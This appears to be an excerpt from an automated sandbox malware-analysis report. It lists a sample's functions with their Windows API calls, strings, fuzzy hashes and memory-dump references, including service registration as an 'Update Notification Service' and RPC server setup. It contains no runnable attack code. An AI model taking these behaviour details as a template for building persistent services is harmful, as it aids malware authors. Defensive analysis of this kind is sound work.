csm, xrefs: 00007FFDA55D487B
csm, xrefs: 00007FFDA55D495C
csm, xrefs: 00007FFDA55D48E2

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 5f6c4c6cd2d0a406009de68e808ca1e35b3779b3abf118ad6cbe70e9de96c55b
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: F4D16D37A09789CAEB22DF65D4503AD67A0FB56B88F100135EA8D57B96DF7CE081C704

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFDA55DB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFDA55DB9E8
GetProcAddress.KERNEL32 ref: 00007FFDA55DB9F4

Strings

ext-ms-, xrefs: 00007FFDA55DB945
api-ms-, xrefs: 00007FFDA55DB932

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: fde0e8f52b11d09605364cf188709883956235a3e02f9e3851d04f6f2126eab5
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 6341C62BB1BA8A91FA17CF16983077A2392BF06FA0F494535DD0D47796EE3CE4458708

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

Security=impersonation static true, xrefs: 0000000140001952
ampIfEp, xrefs: 000000014000195E
ncalrpc, xrefs: 000000014000196D

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFDA55D712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71B1
GetLastError.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D71E9
FreeLibrary.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D7257
GetProcAddress.KERNEL32(?,?,?,00007FFDA55D72EB,?,?,?,00007FFDA55D3EC0,?,?,?,?,00007FFDA55D3CFD), ref: 00007FFDA55D7263

Strings

api-ms-, xrefs: 00007FFDA55D71D1

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: c2791d89649f0358f3f5760d489d7d725788771c1be4c632895068d692f3ddd1
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 8631C32BB2B6C9D1EE17DF42A8207796294BF4AF60F594634ED1D06792EF3CE4418304

Function 00007FFDA55D9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDA55D9453
FlsGetValue.KERNEL32 ref: 00007FFDA55D9468
FlsSetValue.KERNEL32 ref: 00007FFDA55D9489
FlsSetValue.KERNEL32 ref: 00007FFDA55D94B6
FlsSetValue.KERNEL32 ref: 00007FFDA55D94C7
FlsSetValue.KERNEL32 ref: 00007FFDA55D94D8
SetLastError.KERNEL32 ref: 00007FFDA55D94F3

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 595066cfcdd0a141e87c496d776dfaf6f7c4a43708b59e1726635ff1d5180cf1
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 3F213D6BF0E2CA85F65BEF61557133952626F46FB0F144638E93E06BC7FE2CA4418608

Function 00007FFDA55E0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFDA55E0131
GetLastError.KERNEL32 ref: 00007FFDA55E013D
CloseHandle.KERNEL32 ref: 00007FFDA55E0155
CreateFileW.KERNEL32 ref: 00007FFDA55E0180
WriteConsoleW.KERNEL32 ref: 00007FFDA55E019F

Strings

CONOUT$, xrefs: 00007FFDA55E0161

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: e0e1cfd9f61e37e9ad00c875213b98f86e973ac9db4b112506b883751a0c23af
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: 3611A236B19B4582E352CF52A86432972A0BB89FE4F040234ED5E87BA5CF7CD5248748

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Jul 5 2019, xrefs: 0000000140001216
Help, xrefs: 0000000140001238
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
10:52:57, xrefs: 000000014000120F

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
